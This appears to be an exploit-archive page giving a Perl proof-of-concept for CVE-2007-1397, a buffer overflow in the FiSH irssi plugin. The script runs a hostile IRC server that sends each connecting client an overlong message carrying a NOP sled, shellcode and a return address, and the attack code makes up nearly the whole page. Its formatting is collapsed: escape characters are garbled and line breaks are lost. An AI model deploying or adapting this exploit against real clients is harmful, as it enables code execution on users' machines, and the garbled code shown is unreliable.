[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FiSH-irssi v0.99 Evil ircd Buffer Overflow (CVE-2007-1397)
# Published : 2011-04-17
# Author : Caleb James DeLisle
# Previous Title : Cisco Unified Operations Manager Multiple Vulnerabilities
# Next Title : ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)

# FiSH IRC encryption evil ircd PoC exploit.# Abuses CVE-2007-1397# Bad ircd, nasty bnc provider, nicknames over 100 char --> ruin.# Runs arbitrary code which which in this case shuts down irssi.# Tested on my own compiled FiSH with irssi/fedora/x86# There are a lot more problems like this one, you should /unload fish# Caleb James DeLisle - cjduse Socket;$retPtr = "/x60/xef/xff/xbf";# Pirated from some guy called gunslinger_$exit1code = "/x31/xc0/xb0/x01/x31/xdb/xcd/x80";$code = "/x90" x 120 . $exit1code . $retPtr;socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";bind(SOCKET, sockaddr_in(6667, inet_aton(""))) or die "Couldn't bind to port 6667";listen(SOCKET,5) or die "Couldn't listen on port";while(accept(CLIENT,SOCKET)){    sleep 1;    select((select(CLIENT), $|=1)[0]);    print CLIENT ":-psyBNC!~cjd/@ef.net PRIVMSG luser : :($code/r/n";}close(SOCKET);